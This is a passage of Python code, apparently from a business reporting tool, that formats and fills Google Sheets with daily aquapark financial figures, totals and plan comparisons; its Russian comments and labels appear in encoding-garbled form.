{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {}, 'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{self.sheet2_line}:N{self.sheet2_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet3_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.sheet2_line - 1,
"endRowIndex": self.sheet2_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 4
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 4 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 3
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnWidth(0, 300)
ss.prepare_setColumnsWidth(1, 2, 160)
ss.prepare_setValues("A1:C1", [[
'=JOIN(" ";"ะัะพะณะพะฒัะน ะพััะตั ะฑัะดะตั ััะพัะผะธัะพะฒะฐะฝ ัะตัะตะท";DATEDIF(TODAY();DATE(YEAR(TODAY());'
'MONTH(TODAY())+1;1)-1;"D");IF(MOD(DATEDIF(TODAY();DATE(YEAR(TODAY());MONTH(TODAY())+1;1)-1;'
'"D");10)<5;"ะดะฝั";"ะดะฝะตะน"))', "", ""
], ], "ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
ss.prepare_setCellsFormats(
f"A1:C1",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C1", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
i = 0
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 5
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 5 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 4
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnWidth(0, 300)
ss.prepare_setColumnsWidth(1, 2, 160)
ss.prepare_setValues("A1:C1", [[
'=JOIN(" ";"ะัะพะณะพะฒัะน ะพััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฑัะดะตั ััะพัะผะธัะพะฒะฐะฝ ัะตัะตะท";DATEDIF(TODAY();DATE(YEAR(TODAY());'
'MONTH(TODAY())+1;1)-1;"D");IF(MOD(DATEDIF(TODAY();DATE(YEAR(TODAY());MONTH(TODAY())+1;1)-1;'
'"D");10)<5;"ะดะฝั";"ะดะฝะตะน"))', "", ""
], ], "ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
ss.prepare_setCellsFormats(
f"A1:C1",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:C1", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
i = 0
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะะกะข 6
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะกะพะทะดะฐะฝะธะต ะปะธััะฐ 6 ะฒ ัะฐะนะปะต GoogleSheets...')
sheetId = 5
# ะจะธัะธะฝะฐ ััะพะปะฑัะพะฒ
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId,
self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
ss.prepare_setColumnsWidth(0, 1, 105)
ss.prepare_setColumnsWidth(2, 5, 120)
ss.prepare_setColumnWidth(6, 100)
ss.prepare_setColumnWidth(7, 65)
ss.prepare_setColumnWidth(8, 120)
ss.prepare_setColumnWidth(9, 100)
ss.prepare_setColumnWidth(10, 65)
ss.prepare_setColumnWidth(11, 120)
ss.prepare_setColumnWidth(12, 100)
ss.prepare_setColumnWidth(13, 65)
ss.prepare_setColumnWidth(14, 120)
ss.prepare_setColumnWidth(15, 100)
# ะะฑัะตะดะธะฝะตะฝะธะต ััะตะตะบ
ss.prepare_mergeCells("A1:A2")
ss.prepare_mergeCells("B1:B2")
ss.prepare_mergeCells("C1:C2")
ss.prepare_mergeCells("D1:D2")
ss.prepare_mergeCells("E1:E2")
ss.prepare_mergeCells("F1:F2")
ss.prepare_mergeCells("G1:G2")
ss.prepare_mergeCells("H1:J1")
ss.prepare_mergeCells("K1:M1")
ss.prepare_mergeCells("N1:P1")
# ะะฐะดะฐะฝะธะต ะฟะฐัะฐะผะตััะพะฒ ะณััะฟะฟะต ััะตะตะบ
# ะะธัะฝัะน, ะฟะพ ัะตะฝััั
ss.prepare_setCellsFormat('A1:P2', {'horizontalAlignment': 'CENTER', 'textFormat': {'bold': True}})
# ss.prepare_setCellsFormat('E4:E8', {'numberFormat': {'pattern': '[h]:mm:ss', 'type': 'TIME'}},
# fields='userEnteredFormat.numberFormat')
# ะะฐะฟะพะปะฝะตะฝะธะต ัะฐะฑะปะธัั
ss.prepare_setValues("A1:P2", [
[
"ะะฐัะฐ", "ะะตะฝั ะฝะตะดะตะปะธ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ\n ะะะะ", "ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ\n ะคะะะข", "ะะฑัะฐั ััะผะผะฐ\n ะะะะ",
"ะะฑัะฐั ััะผะผะฐ\n ะคะะะข", "ะะตะฟะพะทะธั", "ะะฐััั", "", "", "ะฃัะปัะณะธ", "", "", "ะขะพะฒะฐัั", "", "",
],
[
"", "", "", "", "", "", "", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
"ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ", "ะะพะป-ะฒะพ", "ะกัะผะผะฐ", "ะกัะตะดะฝะธะน ัะตะบ",
]
],
"ROWS")
# ss.prepare_setValues("D5:E6", [["This is D5", "This is D6"], ["This is E5", "=5+5"]], "COLUMNS")
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat("A1:P2", {"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for i in range(2):
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": i, "endRowIndex": i + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
self.google_doc = (self.date_from.strftime('%Y-%m'), self.spreadsheet['spreadsheetId'])
self.google_links[self.google_doc[0]] = [self.google_doc[1], self.doc_version]
links = []
for docid in self.google_links:
links.append([docid, self.google_links[docid][0], self.google_links[docid][1]])
with open(self.list_google_docs, 'w', newline='', encoding='utf-8') as f:
file = csv.writer(f, delimiter=';')
for link in links:
file.writerow(link)
logging.info(
f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะทะดะฐะฝะฐ ะฝะพะฒะฐั ัะฐะฑะปะธัะฐ ั Id: {self.spreadsheet["spreadsheetId"]}')
self.spreadsheet = self.googleservice.spreadsheets().get(spreadsheetId=self.google_doc[1], ranges=[],
includeGridData=True).execute()
# -------------------------------- ะะะะะะะะะะ ะะะะะซะะ ------------------------------------------------
# ะะตัะฐัั ัะฐะฑะปะธัั ะฒ ะบะพะฝัะพะปั
# s = ''
# for line_table in spreadsheet['sheets'][0]['data'][0]['rowData']:
# for cell in line_table['values']:
# try:
# s += cell['formattedValue'] + " | "
# except KeyError:
# pass
# s = ''
# ะัะพะฒะตัะบะฐ ะฝะตั ะปะธ ัะตะบััะตะน ะดะฐัั ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะัะพะฒะตัะบะฐ ะฝะตั ะปะธ ัะตะบััะตะน ะดะฐัั ะฒ ัะฐะฑะปะธัะต...')
self.start_line = 1
self.reprint = 2
for line_table in self.spreadsheet['sheets'][0]['data'][0]['rowData']:
try:
if line_table['values'][0]['formattedValue'] == datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0],
'%d.%m.%Y'):
if self.root.ids.report.ids.split_by_days.active:
self.rewrite_google_sheet()
else:
self.show_dialog_variant(f'ะะตัะตะทะฐะฟะธัะฐัั ััั ัััะพะบั?',
f'ะกััะพะบะฐ ะทะฐ '
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")} '
f'ัะถะต ัััะตััะฒัะตั ะฒ ัะฐะฑะปะธัะต!',
self.rewrite_google_sheet,
)
self.reprint = 0
break
elif line_table['values'][0]['formattedValue'] == "ะะขะะะ":
break
else:
self.start_line += 1
except KeyError:
self.start_line += 1
if self.reprint:
self.write_google_sheet()
# width_table = len(self.spreadsheet['sheets'][0]['data'][0]['rowData'][0]['values'])
return True
def rewrite_google_sheet(self):
    """Overwrite the already-existing row for the current date in the Google sheet.

    Sets ``self.reprint`` to 1 so that ``write_google_sheet`` replaces the
    existing line instead of appending a new one, then delegates the actual
    filling of the spreadsheet to that method.
    """
    # Flag this pass as a rewrite before delegating; write_google_sheet
    # reads self.reprint to decide between replacing and appending a row.
    self.reprint = 1
    logging.warning(f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะตะทะฐะฟะธัั ัะถะต ัััะตััะฒัััะตะน ัััะพะบะธ...')
    self.write_google_sheet()
def write_google_sheet(self):
"""
ะะฐะฟะพะปะฝะตะฝะธะต google-ัะฐะฑะปะธัั
"""
# SHEET 1
# try:
# while True:
# time_of = (datetime.now() - self.google_kwote_timer).seconds
# if time_of < 100:
# logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
# f'ะัะตะฒััะตะฝะพ ะบะพะปะธัะตััะฒะพ ะทะฐะฟัะพัะพะฒ ะฒ API GoogleSheets. \n'
# f'ะัะพะณัะฐะผะผะฐ ะฟัะพะดะพะปะถะธั ะฒัะฟะพะปะฝะตะฝะธะต ัะตัะตะท {100-time_of} ัะตะบ...')
# time.sleep(5)
# else:
# break
# except AttributeError:
# pass
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 1...')
sheetId = 0
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
self.nex_line = self.start_line
control_total_sum = sum([
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1],
self.finreport_dict['ะะฑัะตะฟะธั'][1],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][1],
self.finreport_dict['ะัะพัะตะต'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1],
self.finreport_dict['ะะธะปะตัั ะ ะะ'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][1],
self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][1],
self.finreport_dict['ะะตะฟะพะทะธั'][1],
self.finreport_dict['ะจััะฐั'][1]
])
if self.finreport_dict['ะะขะะะ'][1] != control_total_sum:
logging.error(
f'{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะดะฐะฝะฝัั
: ะกัะผะผะฐ ััะปัะณ ะฝะต ัะฐะฒะฝะฐ ะธัะพะณะพะฒะพะน ััะผะผะต')
self.show_dialog(
'ะะตัะพะพัะฒะตัััะฒะธะต ะดะฐะฝะฝัั
',
f"ะกัะผะผะฐ ััะปัะณ ะฟะพ ะณััะฟะฟะฐะผ + ะดะตะฟะพะทะธั ({control_total_sum}) ะฝะต ัะฐะฒะฝะฐ ะธัะพะณะพะฒะพะน ััะผะผะต "
f"({self.finreport_dict['ะะขะะะ'][1]}). \n"
f"ะ ะตะบะพะผะตะฝะดัะตััั ะฟัะพะฒะตัะธัั ะฟัะฐะฒะธะปัะฝะพ ะปะธ ัะฐะทะดะตะปะตะฝั ััะปัะณะธ ะฟะพ ะณััะฟะฟะฐะผ."
)
ss.prepare_setValues(
f"A{self.nex_line}:AR{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict['ะะฐัะฐ'][0], '%d.%m.%Y'),
weekday_rus[self.finreport_dict['ะะฐัะฐ'][0].weekday()],
f'=\'ะะปะฐะฝ\'!C{self.nex_line}',
f"{self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]}",
f"{self.finreport_dict_lastyear['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]}",
f'=\'ะะปะฐะฝ\'!E{self.nex_line}',
f"={str(self.finreport_dict['ะะขะะะ'][1]).replace('.', ',')}+"
f"AQ{self.nex_line}+AR{self.nex_line}+{str(self.finreport_dict['ะกะผะฐะนะป'][1]).replace('.', ',')}",
f"={str(self.finreport_dict_lastyear['ะะขะะะ'][1]).replace('.', ',')}+"
f"{str(self.finreport_dict_lastyear['Online ะัะพะดะฐะถะธ'][1]).replace('.', ',')}",
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][0],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1],
f"=IFERROR(J{self.nex_line}/I{self.nex_line};0)",
self.finreport_dict['ะะตะฟะพะทะธั'][1],
self.finreport_dict['ะจััะฐั'][1],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1],
f"=IFERROR(O{self.nex_line}/N{self.nex_line};0)",
f'=\'ะะปะฐะฝ\'!I{self.nex_line}',
f'=\'ะะปะฐะฝ\'!J{self.nex_line}',
f"=IFERROR(R{self.nex_line}/Q{self.nex_line};0)",
self.finreport_dict['ะะฑัะตะฟะธั'][0] + self.finreport_dict['ะกะผะฐะนะป'][0],
self.finreport_dict['ะะฑัะตะฟะธั'][1] + self.finreport_dict['ะกะผะฐะนะป'][1],
f"=IFERROR(U{self.nex_line}/T{self.nex_line};0)",
self.finreport_dict_lastyear['ะะฑัะตะฟะธั'][0] + self.finreport_dict_lastyear['ะกะผะฐะนะป'][0],
self.finreport_dict_lastyear['ะะฑัะตะฟะธั'][1] + self.finreport_dict_lastyear['ะกะผะฐะนะป'][1],
f"=IFERROR(X{self.nex_line}/W{self.nex_line};0)",
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0],
self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][1],
f"=IFERROR(AA{self.nex_line}/Z{self.nex_line};0)",
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1],
f"=IFERROR(AD{self.nex_line}/AC{self.nex_line};0)",
self.finreport_dict['ะะธะปะตัั ะ ะะ'][0],
self.finreport_dict['ะะธะปะตัั ะ ะะ'][1],
f"=IFERROR(AG{self.nex_line}/AF{self.nex_line};0)",
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][0],
self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะ ะะ'][1],
f"=IFERROR(AJ{self.nex_line}/AI{self.nex_line};0)",
self.finreport_dict['ะัะพัะตะต'][0] + self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][0],
self.finreport_dict['ะัะพัะตะต'][1] + self.finreport_dict['ะกะพะฟััััะฒัััะธะต ัะพะฒะฐัั'][1],
self.finreport_dict['Online ะัะพะดะฐะถะธ'][0],
self.finreport_dict['Online ะัะพะดะฐะถะธ'][1],
f"=IFERROR(AO{self.nex_line}/AN{self.nex_line};0)",
0,
0,
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:AR{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:AR{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
# ะััะธัะปะตะฝะธะต ะฟะพัะปะตะดะฝะตะน ัััะพะบะธ ะฒ ัะฐะฑะปะธัะต
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 1...')
self.sheet2_line = 1
for line_table in self.spreadsheet['sheets'][2]['data'][0]['rowData']:
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
break
else:
self.sheet2_line += 1
except KeyError:
self.sheet2_line += 1
for i, line_table in enumerate(self.spreadsheet['sheets'][0]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(f"A{height_table}:AR{height_table}",
[[f'ะะขะะะ',
"",
f"=SUM(C3:C{height_table - 1})",
f"=SUM(D3:D{height_table - 1})",
f"=SUM(E3:E{height_table - 1})",
f"=SUM(F3:F{height_table - 1})",
f"=SUM(G3:G{height_table - 1})",
f"=SUM(H3:H{height_table - 1})",
f"=SUM(I3:I{height_table - 1})",
f"=SUM(J3:J{height_table - 1})",
f"=IFERROR(ROUND(J{height_table}/I{height_table};2);0)",
f"=SUM(L3:L{height_table - 1})",
f"=SUM(M3:M{height_table - 1})",
f"=SUM(N3:N{height_table - 1})",
f"=SUM(O3:O{height_table - 1})",
f"=IFERROR(ROUND(O{height_table}/N{height_table};2);0)",
f"=SUM(Q3:Q{height_table - 1})",
f"=SUM(R3:R{height_table - 1})",
f"=IFERROR(ROUND(R{height_table}/Q{height_table};2);0)",
f"=SUM(T3:T{height_table - 1})",
f"=SUM(U3:U{height_table - 1})",
f"=IFERROR(ROUND(U{height_table}/T{height_table};2);0)",
f"=SUM(W3:W{height_table - 1})",
f"=SUM(X3:X{height_table - 1})",
f"=IFERROR(ROUND(X{height_table}/W{height_table};2);0)",
f"=SUM(Z3:Z{height_table - 1})",
f"=SUM(AA3:AA{height_table - 1})",
